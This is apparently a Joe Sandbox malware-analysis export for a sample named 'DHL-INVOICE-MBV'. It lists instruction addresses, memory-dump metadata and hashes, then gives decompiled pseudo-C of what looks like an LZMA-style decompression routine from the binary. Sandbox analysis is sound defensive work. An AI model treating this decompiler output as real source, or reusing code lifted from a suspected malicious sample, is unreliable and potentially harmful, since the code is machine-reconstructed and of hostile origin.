0x00407214
0x0040721c
0x00407223
0x00407225
0x0040722c
0x00407230
0x00407230
0x004070d8
0x004070de
0x004070e5
0x004070ed
0x004070ed
0x004070f0
0x00000000
0x004070f0
0x0040715a
0x00407167
0x0040716a
0x00407076
0x00407076
0x00407076
0x00406812
0x00406812
0x00406812
0x0040681b
0x00000000
0x00000000
0x00406821
0x00406821
0x00000000
0x00406828
0x0040682c
0x00000000
0x00000000
0x00406832
0x00406835
0x00406838
0x0040683b
0x0040683f
0x00000000
0x00000000
0x00406845
0x00406845
0x00406848
0x0040684a
0x0040684b
0x0040684e
0x00406850
0x00406851
0x00406853
0x00406856
0x0040685b
0x00406860
0x00406869
0x0040687c
0x0040687f
0x0040688b
0x004068b3
0x004068b5
0x004068c3
0x004068c3
0x004068c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b7
0x004068b7
0x004068ba
0x004068bb
0x004068bb
0x00000000
0x004068b7
0x0040688d
0x00406891
0x00406896
0x00406896
0x0040689f
0x004068a7
0x004068aa
0x00000000
0x004068b0
0x004068b0
0x00000000
0x004068b0
0x00000000
0x004068cd
0x004068cd
0x004068d1
0x0040717d
0x0040717d
0x00000000
0x0040717d
0x004068d7
0x004068da
0x004068ea
0x004068ed
0x004068f0
0x004068f0
0x004068f0
0x004068f3
0x004068f7
0x00000000
0x00000000
0x004068f9
0x004068f9
0x004068ff
0x00406929
0x0040692f
0x00406936
0x00000000
0x00406936
0x00406901
0x00406905
0x00406908
0x0040690d
0x0040690d
0x00406918
0x00406920
0x00406923
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406968
0x0040696e
0x00406971
0x0040697e
0x00406986
0x00000000
0x00000000
0x0040693d
0x0040693d
0x00406941
0x0040718c
0x0040718c
0x00000000
0x0040718c
0x00406947
0x0040694d
0x00406958
0x00406958
0x00406958
0x0040695b
0x0040695e
0x00406961
0x00406966
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040704b
0x0040704f
0x004071fe
0x004071fe
0x00000000
0x004071fe
0x00407055
0x0040705b
0x00407062
0x0040706a
0x0040706d
0x00407070
0x00407070
0x00407076
0x00407076
0x00000000
0x00000000
0x0040698e
0x0040698e
0x00406990
0x00406993
0x00406a04
0x00406a04
0x00406a07
0x00406a0a
0x00406a11
0x00406a1b
0x00000000
0x00406a1b
0x00406995
0x00406995
0x00406999
0x0040699c
0x0040699e
0x004069a1
0x004069a4
0x004069a6
0x004069a9
0x004069ab
0x004069b0
0x004069b3
0x004069b6
0x004069ba
0x004069c1
0x004069c4
0x004069cb
0x004069cf
0x004069d7
0x004069d7
0x004069d7
0x004069d1
0x004069d1
0x004069d1
0x004069c6
0x004069c6
0x004069c6
0x004069db
0x004069de
0x004069fc
0x004069fc
0x004069fe
0x00000000
0x004069e0
0x004069e0
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069eb
0x004069eb
0x004069eb
0x004069ee
0x004069f1
0x004069f3
0x004069f4
0x004069f7
0x00000000
0x004069f7
0x00000000
0x00406c2d
0x00406c2d
0x00406c31
0x00406c4f
0x00406c4f
0x00406c52
0x00406c59
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6a
0x00406c71
0x00406c72
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c7d
0x00406c82
0x00000000
0x00406c82
0x00406c33
0x00406c33
0x00406c36
0x00406c39
0x00406c43
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00406cbe
0x00406cc1
0x00406cc4
0x00406cce
0x00406c9d
0x00406c9d
0x00406ca0
0x00406ca3
0x00406ca6
0x00406cb3
0x00406cb6
0x00406cb6
0x00000000
0x00000000
0x00406cda
0x00406cda
0x00406cde
0x00000000
0x00000000
0x00406ce4
0x00406ce4
0x00406ce8
0x00000000
0x00000000
0x00406cee
0x00406cee
0x00406cf0
0x00406cf4
0x00406cf4
0x00406cf7
0x00406cfb
0x00000000
0x00000000
0x00406d4b
0x00406d4b
0x00406d4f
0x00406d56
0x00406d56
0x00406d59
0x00406d5c
0x00406d66
0x00000000
0x00406d66
0x00406d51
0x00406d51
0x00000000
0x00000000
0x00406d72
0x00406d72
0x00406d76
0x00406d7d
0x00406d80
0x00406d83
0x00406d78
0x00406d78
0x00406d78
0x00406d86
0x00406d89
0x00406d8c
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d95
0x00406d98
0x00406d9f
0x00406da4
0x00000000
0x00000000
0x00406e32
0x00406e32
0x00406e36
0x004071d4
0x004071d4
0x00000000
0x004071d4
0x00406e3c
0x00406e3c
0x00406e3f
0x00406e42
0x00406e46
0x00406e49
0x00406e4f
0x00406e51
0x00406e51
0x00406e51
0x00406e54
0x00406e57
0x00000000
0x00000000
0x00406a27
0x00406a27
0x00406a2b
0x00407198
0x00407198
0x00000000
0x00407198
0x00406a31
0x00406a31
0x00406a34
0x00406a37
0x00406a3b
0x00406a3e
0x00406a44
0x00406a46
0x00406a46
0x00406a46
0x00406a49
0x00406a4c
0x00406a4c
0x00406a4f
0x00406a52
0x00000000
0x00000000
0x00406a58
0x00406a58
0x00406a5e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a75
0x00406a78
0x00406a7a
0x00406a80
0x00406a83
0x00406a86
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406aae
0x00406ab1
0x00406ab4
0x00406ab7
0x00406abe
0x00406ac2
0x00406ac4
0x00406ac8
0x00406a94
0x00406a94
0x00406a98
0x00406aa0
0x00406aa5
0x00406aa7
0x00406aa9
0x00406aa9
0x00406acb
0x00406ad2
0x00406ad5
0x00000000
0x00406adb
0x00406adb
0x00000000
0x00406adb
0x00000000
0x00406ae0
0x00406ae0
0x00406ae4
0x004071a4
0x004071a4
0x00000000
0x004071a4
0x00406aea
0x00406aea
0x00406aed
0x00406af0
0x00406af4
0x00406af7
0x00406afd
0x00406aff
0x00406aff
0x00406aff
0x00406b02
0x00406b05
0x00406b05
0x00406b05
0x00406b0b
0x00000000
0x00000000
0x00406b0d
0x00406b0d
0x00406b10
0x00406b13
0x00406b16
0x00406b19
0x00406b1c
0x00406b1f
0x00406b22
0x00406b25
0x00406b28
0x00406b2b
0x00406b43
0x00406b46
0x00406b49
0x00406b4c
0x00406b4c
0x00406b4f
0x00406b53
0x00406b55
0x00406b2d
0x00406b2d
0x00406b35
0x00406b3a
0x00406b3c
0x00406b3e
0x00406b3e
0x00406b58
0x00406b5f
0x00406b62
0x00000000
0x00406b64
0x00406b64
0x00000000
0x00406b64
0x00406b62
0x00406b69
0x00406b69
0x00406b69
0x00406b69
0x00000000
0x00000000
0x00406ba4
0x00406ba4
0x00406ba8
0x004071b0
0x004071b0
0x00000000
0x004071b0
0x00406bae
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb8
0x00406bbb
0x00406bc1
0x00406bc3
0x00406bc3
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bcf
0x00406b6d
0x00406b6d
0x00406b70
0x00000000
0x00406b70
0x00406bd1
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bef
0x00406c07
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c17
0x00406c19
0x00406bf1
0x00406bf1
0x00406bf9
0x00406bfe
0x00406c00
0x00406c02
0x00406c02
0x00406c1c
0x00406c23
0x00406c26
0x00000000
0x00406c28
0x00406c28
0x00000000
0x00406c28
0x00000000
0x00406eb5
0x00406eb5
0x00406eb9
0x004071e0
0x004071e0
0x00000000
0x004071e0
0x00406ebf
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec9
0x00406ecc
0x00406ed2
0x00406ed4
0x00406ed4
0x00406ed4
0x00406ed7
0x00000000
0x00000000
0x00406c85
0x00406c85
0x00406c88
0x00000000
0x00000000
0x00406fc4
0x00406fc4
0x00406fc8
0x00406fea
0x00406fea
0x00406fed
0x00406ff7
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406fca
0x00406fca
0x00406fcd
0x00406fd1
0x00406fd4
0x00406fd4
0x00406fd7
0x00000000
0x00000000
0x00407081
0x00407081
0x00407085
0x004070a3
0x004070a3
0x004070a3
0x004070a3
0x004070aa
0x004070b1
0x004070b8
0x004070b8
0x004070bf
0x004070c2
0x004070c9
0x00000000
0x004070cc
0x00407087
0x00407087
0x0040708a
0x0040708d
0x00407090
0x00407097
0x00406fdb
0x00406fdb
0x00406fde
0x00000000
0x00000000
0x00407172
0x00407172
0x00407175
0x00407076
0x00407076
0x00407076
0x00000000
0x0040707c
0x00000000
0x00406dac
0x00406dac
0x00406dae
0x00406db5
0x00406db6
0x00406db8
0x00406dbb
0x00000000
0x00000000
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c2
0x004070c9
0x00000000
0x004070cc
0x00000000
0x00000000
0x00000000
0x00406df1
0x00406df1
0x00406df4
0x00406e2a
0x00406e2a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5d
0x00406f5d
0x00406f60
0x00406f62
0x004071ec
0x004071ec
0x00000000
0x004071ec
0x00406f68
0x00406f68
0x00406f6b
0x00000000
0x00000000
0x00406f71
0x00406f71
0x00406f75
0x00406f78
0x00406f78
0x00406f78
0x00000000
0x00406f78
0x00406df6
0x00406df6
0x00406df8
0x00406dfa
0x00406dfc
0x00406dff
0x00406e00
0x00406e02
0x00406e04
0x00406e07
0x00406e0a
0x00406e20
0x00406e20
0x00406e25
0x00406e5d
0x00406e5d
0x00406e61
0x00406e8a
0x00406e8d
0x00406e8f
0x00406e96
0x00406e99
0x00406e9c
0x00406e9c
0x00406ea1
0x00406ea1
0x00406ea3
0x00406ea6
0x00406ead
0x00406eb0
0x00406edd
0x00406edd
0x00406ee0
0x00406ee3
0x00406f57
0x00406f57
0x00406f57
0x00406f57
0x00000000
0x00406f57
0x00406ee5
0x00406ee5
0x00406eeb
0x00406eee
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f03
0x00406f06
0x00406f1f
0x00406f21
0x00406f24
0x00406f25
0x00406f28
0x00406f2a
0x00406f2d
0x00406f2f
0x00406f31
0x00406f34
0x00406f36
0x00406f39
0x00406f3d
0x00406f3f
0x00406f3f
0x00406f40
0x00406f43
0x00406f46
0x00406f08
0x00406f08
0x00406f10
0x00406f15
0x00406f17
0x00406f1a
0x00406f1a
0x00406f49
0x00406f50
0x00406eda
0x00406eda
0x00406eda
0x00406eda
0x00000000
0x00406f52
0x00406f52
0x00000000
0x00406f52
0x00406f50
0x00406e63
0x00406e63
0x00406e66
0x00406e68
0x00406e6b
0x00406e6e
0x00406e71
0x00406e73
0x00406e76
0x00406e79
0x00406e79
0x00406e7c
0x00406e7c
0x00406e7f
0x00406e86
0x00406e5a
0x00406e5a
0x00406e5a
0x00406e5a
0x00000000
0x00406e88
0x00406e88
0x00000000
0x00406e88
0x00406e86
0x00406e0c
0x00406e0c
0x00406e0f
0x00406e11
0x00406e14
0x00000000
0x00000000
0x00406b73
0x00406b73
0x00406b77
0x004071bc
0x004071bc
0x00000000
0x004071bc
0x00406b7d
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8c
0x00406b8f
0x00406b91
0x00406b94
0x00406b97
0x00406b9a
0x00406b9c
0x00406b9c
0x00406b9c
0x00000000
0x00000000
0x00406cfe
0x00406cfe
0x00406d02
0x004071c8
0x004071c8
0x00000000
0x004071c8
0x00406d08
0x00406d08
0x00406d0b
0x00406d0e
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d26
0x00406d28
0x00406d28
0x00406d28
0x00406d2b
0x00406d2e
0x00406d31
0x00406d34
0x00406d34
0x00406d34
0x00406d37
0x00406d39
0x00406d39
0x00000000
0x00000000
0x00406f7b
0x00406f7b
0x00406f7b
0x00406f7f
0x00000000
0x00000000
0x00406f85
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f90
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa2
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb8
0x00406fba
0x00406fbd
0x00000000
0x00406fbf
0x00406fbf
0x00406d3c
0x00406d3c
0x00000000
0x00406d3c
0x00406fbd
0x004071f2
0x004071f2
0x00000000
0x00000000
0x00406821
0x00407229
0x00407229
0x00000000
0x00407229
0x00407076
0x004070f6
0x004070bf

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FC4() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407231))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
